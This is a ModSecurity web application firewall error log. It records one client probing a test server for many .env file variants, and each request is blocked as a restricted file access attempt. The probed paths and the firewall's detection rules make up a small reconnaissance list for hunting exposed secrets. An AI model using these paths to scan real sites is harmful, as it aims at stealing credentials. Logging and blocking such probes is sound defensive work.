[Wed Feb 19 06:29:49.777800 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/shared/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "Z7VsTQzqEFiMFYV11ByxEQAAAAM"]
[Wed Feb 19 06:29:49.778190 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "Z7VsTQzqEFiMFYV11ByxEQAAAAM"]
[Wed Feb 19 06:29:49.778551 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "Z7VsTQzqEFiMFYV11ByxEQAAAAM"]
[Wed Feb 19 06:29:49.867388 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "Z7VsTQzqEFiMFYV11ByxEwAAAAM"]
[Wed Feb 19 06:29:49.867787 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "Z7VsTQzqEFiMFYV11ByxEwAAAAM"]
[Wed Feb 19 06:29:49.868183 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "Z7VsTQzqEFiMFYV11ByxEwAAAAM"]
[Wed Feb 19 06:29:49.895804 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "Z7VsTQzqEFiMFYV11ByxFAAAAAM"]
[Wed Feb 19 06:29:49.896296 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "Z7VsTQzqEFiMFYV11ByxFAAAAAM"]
[Wed Feb 19 06:29:49.896775 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "Z7VsTQzqEFiMFYV11ByxFAAAAAM"]
[Wed Feb 19 06:29:49.929739 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod.local"] [unique_id "Z7VsTQzqEFiMFYV11ByxFQAAAAM"]
[Wed Feb 19 06:29:49.930141 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod.local"] [unique_id "Z7VsTQzqEFiMFYV11ByxFQAAAAM"]
[Wed Feb 19 06:29:49.930675 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod.local"] [unique_id "Z7VsTQzqEFiMFYV11ByxFQAAAAM"]
[Wed Feb 19 06:29:49.957004 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "Z7VsTQzqEFiMFYV11ByxFgAAAAM"]
[Wed Feb 19 06:29:49.957487 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "Z7VsTQzqEFiMFYV11ByxFgAAAAM"]
[Wed Feb 19 06:29:49.957983 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "Z7VsTQzqEFiMFYV11ByxFgAAAAM"]
[Wed Feb 19 06:29:49.997113 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "Z7VsTQzqEFiMFYV11ByxFwAAAAM"]
[Wed Feb 19 06:29:49.997525 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "Z7VsTQzqEFiMFYV11ByxFwAAAAM"]
[Wed Feb 19 06:29:49.998055 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "Z7VsTQzqEFiMFYV11ByxFwAAAAM"]
[Wed Feb 19 06:29:50.025751 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "Z7VsTgzqEFiMFYV11ByxGAAAAAM"]
[Wed Feb 19 06:29:50.026151 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "Z7VsTgzqEFiMFYV11ByxGAAAAAM"]
[Wed Feb 19 06:29:50.026686 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "Z7VsTgzqEFiMFYV11ByxGAAAAAM"]
[Wed Feb 19 06:29:50.053860 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "Z7VsTgzqEFiMFYV11ByxGQAAAAM"]
[Wed Feb 19 06:29:50.054447 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "Z7VsTgzqEFiMFYV11ByxGQAAAAM"]
[Wed Feb 19 06:29:50.055008 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "Z7VsTgzqEFiMFYV11ByxGQAAAAM"]
[Wed Feb 19 06:29:50.097416 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.live"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.live"] [unique_id "Z7VsTgzqEFiMFYV11ByxGgAAAAM"]
[Wed Feb 19 06:29:50.097877 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.live"] [unique_id "Z7VsTgzqEFiMFYV11ByxGgAAAAM"]
[Wed Feb 19 06:29:50.098470 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.live"] [unique_id "Z7VsTgzqEFiMFYV11ByxGgAAAAM"]
[Wed Feb 19 06:29:50.125300 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_1"] [unique_id "Z7VsTgzqEFiMFYV11ByxGwAAAAM"]
[Wed Feb 19 06:29:50.125686 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_1"] [unique_id "Z7VsTgzqEFiMFYV11ByxGwAAAAM"]
[Wed Feb 19 06:29:50.126126 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_1"] [unique_id "Z7VsTgzqEFiMFYV11ByxGwAAAAM"]
[Wed Feb 19 06:29:50.190523 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "Z7VsTgzqEFiMFYV11ByxHAAAAAM"]
[Wed Feb 19 06:29:50.190821 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "Z7VsTgzqEFiMFYV11ByxHAAAAAM"]
[Wed Feb 19 06:29:50.191173 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "Z7VsTgzqEFiMFYV11ByxHAAAAAM"]
[Wed Feb 19 06:29:50.191793 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "Z7VsTgzqEFiMFYV11ByxHAAAAAM"]
[Wed Feb 19 06:29:50.217791 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "Z7VsTgzqEFiMFYV11ByxHQAAAAM"]
[Wed Feb 19 06:29:50.218193 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "Z7VsTgzqEFiMFYV11ByxHQAAAAM"]
[Wed Feb 19 06:29:50.218726 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "Z7VsTgzqEFiMFYV11ByxHQAAAAM"]
[Wed Feb 19 06:29:50.244886 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.private"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.private"] [unique_id "Z7VsTgzqEFiMFYV11ByxHgAAAAM"]
[Wed Feb 19 06:29:50.245293 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.private"] [unique_id "Z7VsTgzqEFiMFYV11ByxHgAAAAM"]
